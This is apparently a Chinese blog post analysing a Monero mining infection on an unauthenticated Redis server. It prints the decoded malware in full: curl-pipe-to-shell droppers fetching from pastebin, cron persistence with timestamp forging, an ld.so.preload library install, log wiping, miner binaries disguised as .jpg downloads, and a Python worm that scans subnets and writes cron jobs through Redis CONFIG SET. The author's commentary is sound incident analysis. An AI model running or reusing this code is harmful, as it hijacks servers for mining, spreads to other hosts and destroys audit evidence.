针对Redis默认端口的挖矿脚本分析

起因

jpg

jpg

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

跟踪记录流水账

阿里云这截图的给出的命令行参数

/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh


直接看看这个链接的内容

1
2
jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

继续跟踪链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
curl https://pastebin.com/raw/uuYVPLXd

省略一堆被base64加密的内容

解密一下

curl https://pastebin.com/raw/uuYVPLXd | base64 -d

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg


rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270


ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9



pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache



rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json


netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9



y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi



}

function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi

}

function top() {
if [ ! -f "/usr/local/lib/libntp.so" ]; then
curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
if [ ! -f "/usr/local/lib/libntp.so" ]; then
wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
fi
fi
if [ ! -f "/etc/ld.so.preload" ]; then
echo /usr/local/lib/libntp.so >/etc/ld.so.preload
else
sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
fi


touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libjdk.so
touch -acmr /bin/sh /usr/local/lib/libntp.so


echo 0>/var/spool/mail/root #发邮件
echo 0>/var/log/wtmp #登陆记录
echo 0>/var/log/secure #身份权鉴别记录
echo 0>/var/log/cron #cron消息记录
}

function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}

function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#

function有点多,用Atom折叠下。

jpg

1
2
3
4
5
6
7
8
9
10
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
.
.
.
fi

脚本执行的第一步就是根据update返回值确定是不是要更新。

现在我这个时间点去访问,是noupdate

1
2
3
curl https://pastebin.com/raw/C4ZhQFrH

noupdate

rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。

看看这个echocron的function干了啥

1
2
3
4
5
6
7
8
9
10
11
12
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。

留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。

1
2
3
4
/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs
/var/spool/cron/crontabs/root

上面的文件还使用touch -acmr改掉了时间,改成跟sh一个时间,怕是防止运维用find找出来吧。


1
2
3
4
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi

判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。

怀疑.tmp对于apache有较大影响。

1
2
3
4
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}

这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。

现在看看这个python脚本运行的是啥子

先来个base64解密

1
2
3
4
5
6
7
8
9
10
#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
1
curl https://pastebin.com/raw/nYBpuAxT | base64 -d

实际上他要运行的脚本就是这个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()

def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
except Exception:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()

def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()

newthread = staticmethod(newthread)

def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))
except Exception:
pass

def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()

if __name__ == "__main__":
runPortscan()

粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

1
2
3
4
5
6
7
8
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
1
2
3
4
5
6
7
8
9
10
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))

继续往下看

1
2
3
4
5
6
7
8
9
10
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi

看看这个kills的function干了啥

开始的两行就很interesting了,先把同行的挖矿给干了。

1
2
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

第一行是干掉sourplum

第二行是干掉wnTKYg,ddg这个是帮他死掉后重启的。

1
2
3
4
5
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270

不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。

后几行都是删掉了apache的备份。

最后一行,a7b104c270,这个是挖矿的。

整个kill的function看下来,都是针对于apache和挖矿恶意程序。

跟这次比较相关就下面这些

1
2
3
4
5
6
7
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi

从这几行基本可以判定,kworkerds这就是他的挖矿程序。

要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。

把后面遇到的config.json拿到这里来,就很清晰了。

1
"url": "stratum+tcp://xmr.f2pool.com:13531",

看看这个downloadrun的function干了啥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

thyrsi.com,一个图床站。

这里稍微做了下伪装。

kworkerds下到/tmp,并且运行。

这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。

但是在海外下载是没有问题的。

1
2
3
4
5
6
7
8
root@659b8ee8ecf6:/# chmod 777 kworkerds
root@659b8ee8ecf6:/# ./kworkerds
[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
[2018-09-03 18:31:59] : Dev pool connected. Logging in...
[2018-09-03 18:32:01] : Pool logged in.

在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。

1
2
3
4
5
6
7
docker diff debian

C /tmp
A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
A /kworkerds

在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa

1
2
3
4
5
6
7
8
9
10
11
12
"pool_list" :
[
{"pool_address" : "xmr.f2pool.com:13531",
"wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
"rig_id" : "",
"pool_password" : "",
"use_nicehash" : false,
"use_tls" : false,
"tls_fingerprint" : "",
"pool_weight" : 1
},
],

这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333

哪怕没有下载后面的config.json都能够跑。



看看这个system的function干了啥

1
2
3
4
5
6
7
8
9
10
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi

}

先看看这个链接是啥玩儿

1
2
3
curl https://pastebin.com/raw/698D7kZU

/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

又需要你再获取再解码,他不烦吗?

最后得到下面的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}

function init() {
if [ ! -f "/usr/sbin/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
if [ ! -f "/usr/sbin/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
fi
fi
if [ ! -f "/etc/init.d/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
if [ ! -f "/etc/init.d/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
fi
fi
chkconfig --add kworker
}

function echocron() {
echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
}

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
downloadrun
init
echocron
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#

这脚本不得不说,真的有毒。

sh作为解析器,写函数的时候,前面还加function

重命名成httpdns丢到bin目录,还给了执行权限。

在crontab里面增加了定时任务。

0%